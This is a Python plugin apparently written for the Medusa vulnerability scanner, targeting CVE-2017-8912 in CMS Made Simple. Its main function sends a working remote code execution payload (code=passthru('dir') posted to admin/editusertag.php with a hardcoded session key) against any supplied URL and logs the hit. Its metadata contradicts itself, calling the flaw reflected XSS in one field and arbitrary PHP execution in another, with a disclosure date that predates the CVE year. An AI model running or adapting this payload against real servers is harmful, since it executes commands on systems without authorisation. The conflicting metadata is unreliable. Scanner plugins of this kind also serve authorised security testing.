#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import ClassCongregation

class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2017-8912" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "KpLi0rn"  # 插件作者
        self.info['create_date'] = "2020-2-13"  # 插件编辑时间
        self.info['disclosure']='2014-03-03'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "CMSMSRemoteCodeExecutionVulnerability"  # 插件名称
        self.info['name'] ='CMSMS反射型跨站脚本漏洞' #漏洞名称
        self.info['affects'] = "CMSMS"  # 漏洞组件
        self.info['desc_content'] = "远程攻击者可以利用该漏洞，通过代码参数在admin/editusertag.php页面执行任意PHP代码"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "升级最新的系统"  # 修复建议
        self.info['version'] = "2.1.6"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果

def medusa(**kwargs)->None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = url + payload

        Headers["Accept"]="*/*"
        Headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
        Headers["X-Requested-With"]="XMLHttpRequest"
        Headers["Content-Length"]="115"
        Headers["Connection"]="close"
        Headers["Pragma"]="no-cache"
        Headers["Cache-Control"]="no-cache"

        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('''{"response":"Success","details":"}''') != -1 :
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类